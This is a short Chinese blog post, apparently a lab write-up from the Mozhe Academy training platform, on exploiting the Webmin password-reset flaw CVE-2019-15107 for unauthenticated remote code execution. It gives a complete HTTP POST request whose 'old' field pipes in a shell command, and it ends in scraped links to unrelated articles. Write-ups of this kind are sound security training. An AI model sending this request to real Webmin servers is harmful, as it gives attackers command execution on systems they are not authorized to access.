当前位置:网站首页>墨者学院-Webmin未经身份验证的远程代码执行
墨者学院-Webmin未经身份验证的远程代码执行
2022-07-04 07:40:00 【Lyswbb】
首先拿到靶场后进行访问,访问后来到一个登陆页面

根据题目可知,未授权的rce,所以可以先找一下历史CVE编号(CVE-2019-15107),找到之后直接对漏洞进行一个复现,漏洞点在密码重置功能出:Webmin--Webmin confuration--Authentication

burp抓取流量包,然后修改参数,注意需要把session_login.cgi改成password_change.cgi,下面的参数直接复制就行,这个漏洞点的触发只需要传一个expired参数执行命令即可
POST /password_change.cgi HTTP/1.1
Host: 124.70.64.48:47372
Cookie: redirect=1; testing=1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
Origin: https://124.70.64.48:47372
Referer: https://124.70.64.48:47372/session_login.cgi
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
user=dfgfgf&pam=&expired=2&old=test|pwd&new1=test2&new2=test2
直接查询根下的key.txt即可

边栏推荐
- JVM -- class loading process and runtime data area
- win10微软拼音输入法输入文字时候下方不出现中文提示
- 两年前美国芯片扭捏着不卖芯片,如今芯片堆积如山祈求中国帮忙
- Zephyr study notes 2, scheduling
- When JDBC connects to es query, is there a God who meets the following situation?
- 在所有SwiftUI版本(1.0-4.0)中原生实现Charts图表视图之思路
- How to write a summary of the work to promote the implementation of OKR?
- Unity 从Inspector界面打开资源管理器选择并记录文件路径
- System architecture design of circle of friends
- Oracle stored procedures and functions
猜你喜欢

Boosting the Performance of Video Compression Artifact Reduction with Reference Frame Proposals and

This article is enough for learning advanced mysql

L1-027 rental (20 points)

Flask 常用组件

The number of patent applications in China has again surpassed that of the United States and Japan, ranking first in the world for 11 consecutive years

Introduction to rce in attack and defense world

Used on windows Bat file startup project

How to use MOS tube to realize the anti reverse connection circuit of power supply
![[C language] open the door of C](/img/e0/2f107966423d6492c39995c77a445e.jpg)
[C language] open the door of C

手写简易版flexible.js以及源码分析
随机推荐
Valentine's Day is coming! Without 50W bride price, my girlfriend was forcibly dragged away...
PCIe knowledge points -010: where to get PCIe hot plug data
Oceanbase is the leader in the magic quadrant of China's database in 2021
Book list | as the technical support Party of the Winter Olympics, Alibaba cloud's technology is written in these books!
L2-013 red alarm (C language) and relevant knowledge of parallel search
大厂技术专家:架构设计中常用的思维模型
Unity 从Inspector界面打开资源管理器选择并记录文件路径
Zephyr 学习笔记1,threads
PCIE知识点-010:PCIE 热插拔资料从哪获取
2022 - 021arts: début du deuxième semestre
Activiti常见操作数据表关系
tornado项目之路由装饰器
Chain ide -- the infrastructure of the metauniverse
Routing decorator of tornado project
The number of patent applications in China has again surpassed that of the United States and Japan, ranking first in the world for 11 consecutive years
Blue Bridge Cup Quick sort (code completion)
Handwritten easy version flexible JS and source code analysis
BUUCTF(4)
两年前美国芯片扭捏着不卖芯片,如今芯片堆积如山祈求中国帮忙
[network security] what is emergency response? What indicators should you pay attention to in emergency response?